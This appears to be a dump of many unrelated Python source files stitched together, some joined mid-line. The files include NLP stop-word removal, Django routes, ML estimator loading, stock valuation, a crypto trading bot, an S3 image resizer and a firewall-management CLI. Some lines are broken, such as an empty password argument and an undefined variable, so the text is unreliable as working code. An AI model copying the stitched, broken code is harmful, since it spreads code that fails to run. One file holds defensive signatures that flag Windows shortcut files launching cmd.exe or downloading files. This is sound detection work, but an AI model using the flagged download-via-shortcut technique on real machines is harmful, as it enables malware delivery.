Response returned from the `/sentiment` endpoint """ neg: float neu: float pos: float compound: float 0 import numpy as np def RGB_from_hex(hex: str, norm=True): rgb = tuple(int(hex.lstrip('#')[i:i + 2], 16) for i in (0, 2, 4)) if norm: rgb = np.array(rgb)/255 return rgb jiportilla/ontologypython/nlusvc/core/svc/remove_stop_words.py #!/usr/bin/env python # -*- coding: UTF-8 -*- from base import BaseObject from base import DataTypeError from datadict import LoadStopWords class RemoveStopWords(BaseObject): """ Remove Stop Words from Unstructured Text """ def __init__(self, is_debug: bool = False): """ Created: 28-Jun-2019 * refactored out of text-api Updated: 9-Aug-2019 * minor updates in pursuit of https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/688 Updated: 25-Feb-2020 * rewriting to fix defects in this service (I don't understand why the prior version was so complex) https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1878 """ BaseObject.__init__(self, __name__) self.is_debug = is_debug self.loader = LoadStopWords(is_debug=self.is_debug) def _replace(self, some_stopword: str, some_input_text: str) -> str: original_input = some_input_text some_stopword = some_stopword.lower().strip() some_input_text = some_input_text.lower().strip() if some_stopword == some_input_text: return "" def substr(x: int) -> str: y = len(some_stopword) + x + 1 modified_input = f"{original_input[:x]} {original_input[y:]}" modified_input = modified_input.replace(' ', ' ') return self._replace(some_stopword, modified_input) fq = " {} ".format(some_stopword) if fq in some_input_text: return substr(some_input_text.index(fq)) lq = " {}".format(some_stopword) if some_input_text.endswith(lq): return substr(some_input_text.index(lq)) rq = "{} ".format(some_stopword) if some_input_text.startswith(rq): return substr(some_input_text.index(rq)) return some_input_text def process(self, input_text: str or list, aggressive: bool = False) -> str or list: """ :param input_text: :param aggressive: :return: """ def _stopwords(): if not aggressive: return self.loader.standard() return self.loader.load() if type(input_text) == str: for stopword in _stopwords(): input_text = self._replace(stopword, input_text) return input_text elif type(input_text) == list: results = [] for input_item in list(input_text): for stopword in _stopwords(): input_item = self._replace(stopword, input_item) results.append(input_item) return results else: raise 
DataTypeError("Expected Str or List Input") from django.urls import path, include from productapp import api urlpatterns = [ path('product/', api.ProductApiView.as_view()), path('category/', api.CategoryApiView.as_view()), path('profile/', api.ProfileApiView.as_view()), path('order/', api.OrderApiView.as_view()), path('invoice/', api.InvoiceApiView.as_view()), ]# Copyright (c) Microsoft Corporation. # Licensed under the MIT License. from bson.objectid import ObjectId from sklearn.base import BaseEstimator from sklearn.linear_model import LogisticRegression from sklearn.neural_network import BernoulliRBM from sklearn.pipeline import make_pipeline from sklearn.preprocessing import StandardScaler from sklearn.semi_supervised import LabelSpreading from sklearn.svm import SVC from sklearn.tree import DecisionTreeClassifier from .data_persistence import is_saved, load, save from ..types import Model def load_estimator(model: Model) -> BaseEstimator: estimator_type = model['type'] estimator_id = model['objectId'] assert estimator_type in [ 'DecisionTree', 'SVM', 'LogisticRegression', 'RestrictedBoltzmannMachine', 'LabelSpreading', ] if is_saved(inserted_id=ObjectId(estimator_id)): estimator = load(inserted_id=ObjectId(estimator_id)) else: if estimator_type == 'DecisionTree': estimator = DecisionTreeClassifier() if estimator_type == 'SVM': estimator = SVC(gamma=0.001) if estimator_type == 'LogisticRegression': estimator = make_pipeline( StandardScaler(), LogisticRegression(C=1, penalty='l2', tol=0.01, solver='saga'), ) if estimator_type == 'LabelSpreading': estimator = LabelSpreading(gamma=0.25, max_iter=20) if estimator_type == 'RestrictedBoltzmannMachine': estimator = make_pipeline( BernoulliRBM(random_state=0), LogisticRegression(solver='newton-cg', tol=1), ) save(data=estimator, inserted_id=ObjectId(estimator_id)) return estimator from typing import List from Models.Enums.WebdriverEnum import WebdriverEnum class ConfigWebdriverModel(): driver_type: WebdriverEnum driver_path: str extension_paths: List[str] def __init__(self, json): self.driver_type = WebdriverEnum[json['driver_type']] self.driver_path = json['driver_path'] self.extension_paths = json['extension_paths']10-100 # Copyright (c) 2018, # Copyright (c) 2018, Xilinx, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION). 
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from abc import ABCMeta, abstractmethod, abstractproperty import numpy as np import cffi import os from pynq import Overlay, PL, Xlnk LSTM_ROOT_DIR = os.path.dirname(os.path.realpath(__file__)) LSTM_LIB_DIR = os.path.join(LSTM_ROOT_DIR, 'libraries') LSTM_BIT_DIR = os.path.join(LSTM_ROOT_DIR, 'bitstreams') LSTM_DATA_DIR = os.path.join(LSTM_ROOT_DIR, 'datasets') RUNTIME_HW = "python_hw" RUNTIME_SW = "python_sw" class PynqLSTM(object): __metaclass__ = ABCMeta def __init__(self, runtime, network, load_overlay): self._ffi = cffi.FFI() self._libraries = {} if runtime == RUNTIME_HW: self.bitstream_name="{0}.bit".format(network) self.bitstream_path=os.path.join(LSTM_BIT_DIR, self.bitstream_name) if PL.bitfile_name != self.bitstream_path: if load_overlay: Overlay(self.bitstream_path).download() else: raise RuntimeError("Incorrect Overlay loaded") dllname = "{0}-{1}.so".format(runtime, network) if dllname not in self._libraries: self._libraries[dllname] = self._ffi.dlopen( os.path.join(LSTM_LIB_DIR, dllname)) self.interface = self._libraries[dllname] self._ffi.cdef(self.ffi_interface) @property def ops_per_seq_element(self): return self.lstm_ops_per_seq_element @property def lstm_ops_per_seq_element(self): gate_input_size = self.input_size + self.hidden_size + 1 if self.bias_enabled else self.input_size + self.hidden_size #2 accounts for mul and add separately, 4 is the number of gates ops = 2 * gate_input_size * 4 * self.hidden_size #element wise muls and peepholes ops = ops + 3 * self.hidden_size * 2 if self.peepholes_enabled else ops + 3 * self.hidden_size #directions return ops * 2 if self.bidirectional_enabled else ops def cleanup(self): xlnk = Xlnk() xlnk.xlnk_reset() @abstractproperty def input_size(self): pass @abstractproperty def hidden_size(self): pass @abstractproperty def peepholes_enabled(self): pass @abstractproperty def bias_enabled(self): pass @abstractproperty def bidirectional_enabled(self): pass @abstractproperty def ffi_interface(self): pass @abstractmethod def inference(self, path): pass @abstractmethod def preprocess(self, input_data): pass """Built-in plugins template for autofile""" mmpi/data/signatures/lnk/lnk_infos.py # -*- coding: utf-8 -*- # @Time : 2021/01/14 00:28:17 # @Author : ddvv # @Site : https://ddvvmmzz.github.io # @File : lnk_infos.py # @Software: Visual Studio Code from data_lib.mmpi.common.abstracts import Signature class LnkExecCMD(Signature): authors = ["ddvv"] sig_type = 'lnk' name = "lnk_exec_cmd" severity = 6 description = "lnk exec cmd" def on_complete(self): results = self.get_results() for result in results: if result.get('type', '') == self.sig_type: infos = result.get('value', {}).get('infos', []) for info in infos: relativePath = info.get('data', {}).get('relativePath', '') if relativePath: if relativePath.endswith('cmd.exe'): self.mark(type="lnk", tag=self.name, relativePath=relativePath) return self.has_marks() return None class LnkDownloadFile(Signature): authors = ["ddvv"] sig_type = 'lnk' name = "lnk_download_file" severity = 9 description = "lnk download file" def on_complete(self): results = self.get_results() for result in results: if result.get('type', '') == self.sig_type: infos = result.get('value', {}).get('infos', []) for info in infos: commandLineArguments = info.get('data', 
{}).get('commandLineArguments', '') if commandLineArguments: if 'downloadfile' in commandLineArguments: self.mark(type="lnk", tag=self.name, commandLineArguments=commandLineArguments) return self.has_marks() return None# -*- coding: utf-8 -*- from . import stock_data as ed from . import macro_data as md from .my_logging import get_logger logger = get_logger() def get_spm_price(equity_code, report_period, required_return=None): ''' Sum of Perpetuities Method (SPM) P = E * G / K**2 + D / K where P: price E: EPS G: growth rate K: required return, discount rate D: dividend per share ''' e = ed.get_net_income(equity_code, report_period) / ed.get_total_share(equity_code, report_period) g = get_growth_rate(equity_code, report_period) if required_return is None: k = md.get_deposit_rate('定期存款整存整取(五年)') else: k = required_return d =ed.get_dividend_per_share(equity_code, report_period) price = e * g / k**2 + d / k return price def get_ggm_price(equity_code, report_period, required_return=None): ''' Gordon Growth Model (GGM). It is a special case of Dividend Discount Model (DDM). P = D0 * (1 + g) / (r - g) where P: price D0: dividend g: growth rate r: required return ''' d0 = ed.get_dividend_per_share(equity_code, report_period) g = get_growth_rate(equity_code, report_period) if required_return is None: r = md.get_deposit_rate('定期存款整存整取(五年)') else: r = required_return price = d0 * (1 + g) / (r - g) return price def get_growth_rate(equity_code, report_period): """ growth rate = ROE * retention ratio """ roe = get_roe(equity_code, report_period) retention_ratio = ed.get_retention_ratio(equity_code, report_period) growth_rate = roe * retention_ratio logger.debug('growth_rate=%s', growth_rate) return growth_rate def get_dividend_growth_rate(equity_code, report_period): """ TODO: Geometric mean of the dividend growth in each year """ def validate_dividend_growth_rate(): """ TODO: The dividend growth rate should not be much far away from GDP growth rate """ def get_roe(equity_code, report_period): net_income = ed.get_net_income(equity_code, report_period) total_equity = ed.get_total_equity(equity_code, report_period) roe = net_income / total_equity logger.debug('roe=%s', roe) return roe def get_roa(equity_code, report_period): net_income = ed.get_net_income(equity_code, report_period) total_asset = ed.get_total_asset(equity_code, report_period) roa = net_income / total_asset logger.debug('roa=%s', roa) return roa def get_rrr_capm(beta=None, rm=None): ''' TODO: Get required rate of return by Capital Asset Pricing Model (CAPM) rrr from CAPM = rf + beta(rm - rf) where rrr: required rate of return rf: Risk free rate beta: market risk rm: expected market return ''' logger.debug('beta=%s, rm=%s', beta, rm) rf = md.get_deposit_rate('定期存款整存整取(五年)') if beta is None: beta = 1 if rm is None: rm = 0.1 rrr_from_capm = rf + beta * (rm - rf) logger.debug('rrr_from_capm=%s', rrr_from_capm) return rrr_from_capm def get_rrr_wacc(equity_code, report_period): ''' TODO: Get required rate of return using Weighted Average Cost of Capital (WACC) rrr from WACC = (total equity / total asset) * cost of equity + (total debt / total asset) * cost of debt * (1 - tax rate) ''' logger.debug('equity_code=%s, report_period=%s', equity_code, report_period) total_asset = ed.get_total_asset(equity_code, report_period) total_equity = ed.get_total_equity(equity_code, report_period) total_debt = ed.get_total_debt(equity_code, report_period) # Tax rate in China is average 40% tax_rate = 0.4 # TODO: Calculate cost of debt of the company. 
Here is using loan rate. cost_of_debt = md.get_loan_rate('中长期贷款(五年以上)', report_period) # TODO:Calculate cost of equity. Here is using dividend ratio. cost_of_equity = 1 - ed.get_retention_ratio(equity_code, report_period) rrr_from_wacc = (total_equity / total_asset) * cost_of_equity + (total_debt / total_asset) * cost_of_debt * (1 - tax_rate) logger.debug('rrr_from_wacc=%s', rrr_from_wacc) return rrr_from_wacc """A Tcl kernel for Jupyter""" __version__ = '0.0.4' t = src() if x == t: y = "ola" else: y = "adeus" snk(y) brianhaines/CryptoBot #!/usr/bin/env python3 from settings import API_KEY from settings import API_SECRET from settings import API_PASSPHRASE from settings import PRODUCTS from settings import DBNAME from settings import DB_USER from settings import DB_PASSWORD from event import TickEvent from strategy import MovingAverageStrategy from decimal import Decimal, getcontext, ROUND_HALF_DOWN import pymysql.cursors import logging import queue import threading import time import gdax class CryptoBot(gdax.WebsocketClient): def __init__(self, product=None, events=None, key=None, secret=None, passphrase=None, channel=None): super(CryptoBot, self).__init__(products=product, channels=channel) def on_open(self): self.events_queue = events self.url = "wss://ws-feed.gdax.com/" self.message_count = 0 print("Let the streaming begin!") def on_message(self,msg): b = len(PRODUCTS) if msg['type'] == 'ticker': if self.message_count > b: self.events_queue.put( TickEvent( product = msg['product_id'], sequence = msg['sequence'], time = msg['time'], price = Decimal(msg['price']), bid = Decimal(msg['best_bid']), ask = Decimal(msg['best_ask']), spread = Decimal(msg['best_ask']) - Decimal(msg['best_bid']), side = msg['side'], size = Decimal(msg['last_size']).quantize(Decimal('0.000000001'),rounding=ROUND_HALF_DOWN) ) ) else: print(msg) self.message_count += 1 def on_close(self): print('Closing time!') def trade(events,strategy): latestPrices= {} latestPrices['USD-USD'] = {"bid": Decimal("1.0"), "ask": Decimal("1.0"),"last":Decimal("1.0")} arbitrages = {} arbitrages['ETH-BTC'] = {'in':Decimal('0.0000'),'out':Decimal('0.0000'),'spread':Decimal('0.0000')} for prod in PRODUCTS: latestPrices[prod] = {"bid": None, "ask": None,"last":None} conn = pymysql.connect(host='localhost', user=DB_USER, password=, db=DBNAME, cursorclass=pymysql.cursors.DictCursor) try: while True: try: event = events.get(False) except queue.Empty: pass else: if event is not None: if event.type == 'TICK': latestPrices[event.product] = {'bid':event.bid,'ask':event.ask,'last':event.price} # Send tick to strategy strategy.calculateSignal(event) with conn.cursor() as cursor: sql = '''INSERT INTO ticks(sequence, product, time, price, bid, ask, spread, side, size) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)''' cursor.execute(sql,(event.sequence, event.product, event.time, event.price, event.bid, event.ask, event.spread, event.side, event.size)) conn.commit() if event.product == 'ETH-BTC': # Buy BTC-USD, buy ETH-BTC, sell ETH-USD arbitrages[event.product]['in'] = latestPrices['ETH-USD']['bid'] / latestPrices['BTC-USD']['ask'] - latestPrices['ETH-BTC']['ask'] # Buy ETH-USD, sell ETH-BTC, sell BTC-USD arbitrages[event.product]['out'] = latestPrices['ETH-USD']['ask'] / latestPrices['BTC-USD']['bid'] - latestPrices['ETH-BTC']['bid'] # Arb spread arbitrages[event.product]['spread'] = arbitrages[event.product]['out'] - arbitrages[event.product]['in'] with conn.cursor() as cursor: sql = '''INSERT INTO arbitrage(product, time, arb_in, arb_out, arb_spread, 
arb_size_in, arb_size_out) VALUES(%s,%s,%s,%s,%s,%s,%s)''' cursor.execute(sql,(event.product, event.time, round(arbitrages[event.product]['in'],9), round(arbitrages[event.product]['out'],9), round(arbitrages[event.product]['spread'],9),None,None)) conn.commit() elif event.sequence % 25 == 0 or event.size > 2: print('This is a {0} Tick: {1} and {2} / {3}'.format( event.product, latestPrices[event.product]['last'], latestPrices[event.product]['bid'], latestPrices[event.product]['ask'] )) elif event.type == 'SIGNAL': print('This is a SIGNAL: {0} {1} params: {2}/{3}'.format(event.side,event.market,event.sig_params['short_sma'],event.sig_params['long_sma'])) except KeyboardInterrupt: print('Closing Time') CryptoBot.close() conn.close() if __name__ == '__main__': channel = ['ticker'] events = queue.Queue() # Streaming prices streamingPrices = CryptoBot( product = PRODUCTS, channel = channel, events = events, secret = API_SECRET, key = API_KEY, passphrase = API_PASSPHRASE ) # The trading strategy strategy = MovingAverageStrategy(PRODUCTS, events) trade_thread = threading.Thread(target=trade, args=(events, strategy)) streamingPrices.start() trade_thread.start() entry.py0 #!/usr/bin/env python from telnyx_2fa.app import main main() #!/usr/bin/env python from __future__ import print_function from __future__ import unicode_literals try: from urllib.parse import quote as urlquote # >=3.0 except ImportError: from urllib import quote as urlquote class UserAPI(object): #### ## User API ## def authenticate(self, user, password): """ TODO: add docstring apikey:str """ with self.post("/v3/user/authenticate", {"user": user, "password": password}) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Authentication failed", res, body) js = self.checked_json(body, ["apikey"]) apikey = js["apikey"] return apikey def list_users(self): """ TODO: add docstring => [[name:str,organization:str,[user:str]] """ with self.get("/v3/user/list") as res: code, body = res.status, res.read() if code != 200: self.raise_error("List users failed", res, body) js = self.checked_json(body, ["users"]) def user(roleinfo): name = roleinfo["name"] email = roleinfo["email"] return (name, None, None, email) # set None to org and role for API compatibility return [ user(roleinfo) for roleinfo in js["users"] ] def add_user(self, name, org, email, password): """ TODO: add docstring => True """ params = {"organization": org, "email": email, "password": password} with self.post("/v3/user/add/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Adding user failed", res, body) return True def remove_user(self, name): """ TODO: add docstring => True """ with self.post("/v3/user/remove/%s" % (urlquote(str(name)))) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Removing user failed", res, body) return True def change_email(self, name, email): """ TODO: add docstring => True """ params = {"email": email} with self.post("/v3/user/email/change/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Changing email failed", res, body) return True def list_apikeys(self, name): """ TODO: add docstring => [apikey:str] """ with self.get("/v3/user/apikey/list/%s" % (urlquote(str(name)))) as res: code, body = res.status, res.read() if code != 200: self.raise_error("List API keys failed", res, body) js = self.checked_json(body, ["apikeys"]) return js["apikeys"] def add_apikey(self, 
name): """ TODO: add docstring => True """ with self.post("/v3/user/apikey/add/%s" % (urlquote(str(name)))) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Adding API key failed", res, body) return True def remove_apikey(self, name, apikey): """ TODO: add docstring => True """ params = {"apikey": apikey} with self.post("/v3/user/apikey/remove/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Removing API key failed", res, body) return True def change_password(self, name, password): """ TODO: add docstring => True """ params = {"password": password} with self.post("/v3/user/password/change/%s" % (urlquote(str(name))), params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Changing password failed", res, body) return True def change_my_password(self, old_password, password): """ TODO: add docstring => True """ params = {"old_password": _password, "password": password} with self.post("/v3/user/password/change", params) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Changing password failed", res, body) return True import boto3 import os import uuid from urllib.parse import unquote_plus from PIL import Image s3_client = boto3.client('s3') def resize_image(picture_file_path, crop_dimensions=None): # get the profile pics store ready image = Image.open(picture_file_path) if crop_dimensions: image = image.crop(crop_dimensions) widthGet = os.environ.get('RESIZE_WIDTH') heightGet = os.environ.get('RESIZE_HEIGHT') width = int(widthGet) height = int(heightGet) image = image.resize((width, height)) # save and convert to jpg here cropped_filename = os.path.join(os.path.dirname(picture_file_path), "{}_cropped.jpg".format(picture_file_path)) thumbnail_filename = os.path.join(os.path.dirname(picture_file_path), "{}_thumbnail.jpg".format(picture_file_path)) image.save(cropped_filename) thumbnailWidthGet = os.environ.get('THUMBNAIL_WIDTH') thumbnailHeightGet = os.environ.get('THUMBNAIL_HEIGHT') thumbnailWidth = int(thumbnailWidthGet) thumbnailHeight = int(thumbnailHeightGet) image = image.resize((thumbnailWidth, thumbnailHeight)) image.save(thumbnail_filename) return (cropped_filename, thumbnail_filename) def handler(event, context): amplify_storage_bucket_name = os.environ.get('STORAGE_PLATELETSTORAGE_BUCKETNAME') print(os.environ) for record in event['Records']: bucket = record['s3']['bucket']['name'] key = unquote_plus(record['s3']['object']['key']) tmpkey = key.replace('/', '') download_path = '/tmp/{}{}'.format(uuid.uuid4(), tmpkey) print('Downloading {} from bucket {} to {}'.format(key, bucket, download_path)) s3_client.download_file(bucket, key, download_path) (newImage, thumbnail) = resize_image(download_path) base_key = key.split('.')[0] s3_client.upload_file(newImage, amplify_storage_bucket_name, key) s3_client.upload_file(thumbnail, amplify_storage_bucket_name, "{}_thumbnail.jpg".format(base_key)) s3_client.delete_object(Bucket=bucket, Key=key) pylith/mpi/Communicator.py0 # ---------------------------------------------------------------------- # # , U.S. Geological Survey # , GNS Science # , University of Chicago # # This code was developed as part of the Computational Infrastructure # for Geodynamics (http://geodynamics.org). # # Copyright (c) 2010-2017 University of California, Davis # # See COPYING for license information. 
# # ---------------------------------------------------------------------- # # @file pylith/mpi/Communicator.py ## # @brief Python MPI communicator object. ## # Provides SWIG friendly interface to MPI communicator object. ## # The communicator requires special treatment because we do not have # a normal SWIG interface definition. SWIG treats the communicator in # the same way it treats a pointer to an object, even if it is an # integer. import pylith.mpi.mpi as mpimodule # Communicator class class Communicator(object): """Python MPI communicator object. """ # PUBLIC METHODS ///////////////////////////////////////////////////// def __init__(self, handle): """Constructor. """ # Transfer responsibility of memory management from module to this # class. handle.disown() self.handle = handle self.rank = mpimodule.rank(self.handle) self.size = mpimodule.size(self.handle) return def __del__(self): del self.rank del self.size mpimodule.destroy_comm(self.handle) del self.handle return def barrier(self): """MPI Barrier. """ mpimodule.barrier(self.handle) return # ---------------------------------------------------------------------- def petsc_comm_world(): """Python wrapper around PETSC_COMM_WORLD. """ global _petsc_world if _petsc_world is None: _petsc_world = Communicator(mpimodule.petsc_comm_world()) return _petsc_world # ---------------------------------------------------------------------- def petsc_comm_self(): """Python wrapper around PETSC_COMM_SELF. """ global _petsc_self if _petsc_self is None: _petsc_self = Communicator(mpimodule.petsc_comm_self()) return _petsc_self # ---------------------------------------------------------------------- def mpi_comm_world(): """Python wrapper around MPI_COMM_WORLD. """ global _mpi_world if _mpi_world is None: _mpi_world = Communicator(mpimodule.mpi_comm_world()) return _mpi_world # ---------------------------------------------------------------------- def mpi_comm_self(): """Python wrapper around MPI_COMM_SELF. 
""" global _mpi_self if _mpi_self is None: _mpi_self = Communicator(mpimodule.mpi_comm_self()) return _mpi_self # ---------------------------------------------------------------------- # Singletons _petsc_world = None _petsc_self = None _mpi_world = None _mpi_self = None # End of file smcscript/commands.py # -*- coding: utf-8 -*- """ CLI functions """ from __future__ import print_function, unicode_literals import time import logging import os import sys import yaml import subprocess import tempfile from lxml import etree import etconfig from argh.decorators import arg, named from mako.template import Template from mako.lookup import TemplateLookup from mako.exceptions import TemplateLookupException, SyntaxException from smcscript.exceptions import SMCConnectionError, InvalidSessionError, \ ResolveError, SMCOperationFailure, CommandError from smcscript.session import Session as SMCSession from smcscript.api import SMCClient from smcscript.script import run_script, RunScriptError from smcscript.resolver import resolve_hname from smcscript.utils import get_session_file_path, print_err, print_fmt, save_session, load_session # pylint: disable=invalid-name logger = logging.getLogger(__name__) #---------------------------------------------------------------------- # commands #---------------------------------------------------------------------- @arg("server", help="address or name of the SMC to log to", default=None, nargs='?') @arg("-k", "--api-key", dest="api_key", required=False, help="api key of the SMC rest API") @arg("-s", "--secure", dest="secure", action="store_true", help="Use HTTPS to connect") @arg("-c", "--cacert", dest="ca_cert", help="path of the CA certificate to verify the connection") @arg("-p", "--port", default=8082, help="TCP port of the SMC rest API") @arg("-v", "--version", help="API version to use (e.g. 6.4). 
If not specified, the highest version is selected") @arg("-f", "--file", dest="smcrc", help="provide login info in given file (same format as ~/.smcrc)") @arg("-a", "--auto", help="login using ~/.smcrc)") @named("login") def cmd_login(server, secure=False, port=None, api_key=None, version=None, ca_cert=None, smcrc=None, auto=False): """ login to the smc (rest api) If a file is specified using '-f' or --file, it must have the following format: [smc] smc_address=192.168.100.7 smc_apikey=xxxx api_version=6.4 smc_port=8082 smc_ssl=False verify_ssl=False ssl_cert_file='' """ #todo tls if not server and not smcrc and not auto: raise CommandError("Must have either --file or or --auto") if int(server is not None)+int(smcrc is not None)+int(auto) > 1: raise CommandError("Cannot have both and/or --file and/or --auto") if server and not api_key: raise CommandError("missing --api-key") proto = "https" if secure else "http" url = "{proto}://{host}:{port}".format(host=server, port=port, proto=proto) \ if server else None verify = ca_cert or False sess = SMCSession() try: sess.login(url=url, api_key=api_key, verify=verify, api_version = version, alt_filepath=smcrc) #todo save to another place (env var) if not save_session(sess): print_err("Failed to save session") return "login successful" except SMCConnectionError as conn_error: logger.exception(conn_error) raise CommandError( "connection to '{}:{}' failed\n({})".format(server, port, conn_error)) @named("logout") def cmd_logout(): """ logout from the smc """ session_file_path = get_session_file_path() if os.path.isfile(session_file_path): sess = load_session(session_file_path) sess.logout() os.remove(session_file_path) @named("push") @arg("-p", "--policy", dest="policy", required=True) def cmd_push(hname, policy=None): session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: res = smc_client.execute(hname, operation="upload", params={'filter': policy}) xml = etree.XML(str(res)) follower = xml.findtext("follower") print(follower) while True: res2= smc_client.get(follower) print(res2) print(time.sleep(2)) except Exception as exc: raise CommandError(exc) @named("list") @arg("hname", nargs='?', default=None) def cmd_list(hname, json=False, xml=False, links=False): """ list the sub-element under given hierarchical name (hname) """ session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: res = smc_client.list(hname) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) for name in sorted(res): print_fmt("{}", name) @named("del") def cmd_del(hname): """ delete an element with its hierarchical name (hname) """ #todo error session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: smc_elt = smc_client.get(hname) smc_client.delete(smc_elt) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) @named("apply") @arg("filename") @arg("-p", "--print", dest="print_only", help="print the payload of the smc-api request") @arg("-pp", "--preprocess", dest="preprocess_only", help="print the payload of the smc-api request") @arg("-v", '--var', dest='key_values', action='append', help="assign a variable (e.g. 
-v my_ip=10.1.1.1)", default=[], type=str) @arg("-vf", '--var-file', dest='variable_files', action='append', help="read variables from a file", default=[], type=str) @arg("-i", '--ignore-errors', dest='ignore_errors', help="continue script execution on error") @arg("-d", '--delete', dest='delete_mode', help="delete all the resources defined in the file") @arg("-c", '--cleanup', dest='cleanup_mode', help="delete all the resources before applying the config") def cmd_apply(filename, print_only=False, preprocess_only=False, key_values=None, ignore_errors=False, delete_mode=False, cleanup_mode=False, variable_files=None): """ execute a script file. """ temp_file = None variables = {} for kv in key_values: (k, v) = kv.split("=") variables[k] = v session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) if filename=="-": content = sys.stdin.read() tf = tempfile.NamedTemporaryFile(suffix=".cnf", delete=False) tf.write(content.encode("utf-8")) tf.close() temp_file = tf.name filename = temp_file try: run_script(smc_client, filename, print_only, preprocess_only, variables, variable_files, ignore_errors, delete_mode, cleanup_mode) except (IOError) as err: raise CommandError(err) except (TemplateLookupException, SyntaxException, NameError) as err: raise CommandError(u"(Preprocessing): " + unicode(err)) except (etconfig.ElementConfError) as err: raise CommandError(u"(Parsing): " + unicode(err)) except (RunScriptError) as err: raise CommandError(u"(ScriptExec): " + unicode(err)) except (InvalidSessionError) as err: raise CommandError(u"(Session): " + unicode(err)) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) if temp_file: os.remove(temp_file) @named("convert") @arg("filename") @arg("-f", "--format", choices=["json", "yaml", "xml"], default="yaml", dest="fmt") def cmd_convert(filename, fmt=None): """ convert file format (to cnf, yaml or xml) """ mylookup = TemplateLookup(directories=["."]) tmpl = Template(filename=filename, lookup=mylookup) rendered = tmpl.render() elt = etconfig.loads(rendered, single_root_node=False, id_mapper=etconfig.id2attr("name")) is_xml = (fmt == "xml") is_yaml = (fmt == "yaml") is_json = (fmt == "json") if is_xml: xml = etree.tostring(elt, encoding='utf8', pretty_print=True) print(xml) elif is_yaml: struct = etconfig.utils.el_to_struct(elt, False) print(yaml.dump(struct)) elif is_json: # todo pass @named("get") # @arg("-l", "--links", dest="links", action="store_const", const=True) @arg("-f", "--format", choices=["yaml", "xml", "conf"], default="conf", dest="fmt") def cmd_get(hname, fmt=None): """retrieve an smc element with its hierarchical name (hname) and display it. 
""" is_xml = (fmt == "xml") is_yaml = (fmt == "yaml") is_conf = (fmt == "conf") #todo error session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: smc_element = smc_client.get(hname) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) elt = smc_element.data if is_xml: xml = etree.tostring(elt, encoding='utf8', pretty_print=True) print_fmt(xml) elif is_conf: conf = etconfig.dumps(elt, print_root=True) print_fmt(conf) elif is_yaml: struct = etconfig.utils.el_to_struct(elt) print(yaml.dump(struct)) @named("hname") def cmd_show_hname(hname): """ convert a hierarchical name (hname) into the corresponding url """ session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: url = resolve_hname(smc_client.rest_client, hname) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) print_fmt(url) cmd_list = [cmd_login, cmd_logout, cmd_list, cmd_apply, cmd_del, cmd_get, cmd_show_hname, cmd_convert, cmd_push] # -*- coding: utf-8 -*- """ @file:make_option_type_feature.py @time:2019/6/9 9:09 @author:Tangj @software:Pycharm @Desc """ import pandas as pd import numpy as np ''' 先给trian集中加入charge_type和'target_type',然后把训练集按照aid进行groupby操作, 取出aid,然后将对该广告的操作数据取出来,然后按照changetime进行排序, 然后对于大于等于请求日期之后的就将其归为该条操作数据的类型 这样也不用去管对应的是新建操作还是修改操作了,反正修改肯定是在新建之后的操作。 ''' train = pd.read_csv('../usingData/train/metafea_train.csv') operate = pd.read_csv('../usingData/train/train_bid.csv') print(operate) def f(x): xx = str(x) tt = xx[0:8] t = int(tt) return t changeTime = operate['changeTime'].values new_time = list(map(f, changeTime)) operate['changeDay'] = new_time new = operate.groupby('ad_id') print(operate.columns) # ['ad_id', 'changeTime', 'operateType', 'target_type', 'charge_type', # 'bid', 'changeDay'] # for i in new: # ii = i[1] # num = len(ii['charge_type'].unique()) # if num != 1: # print(num) # print(ii[['ad_id', 'changeTime', 'charge_type', 'operateType','changeDay']]) # print(ii[['changeDay','charge_type']]) # opstatus.index = opstatus['statime'] # 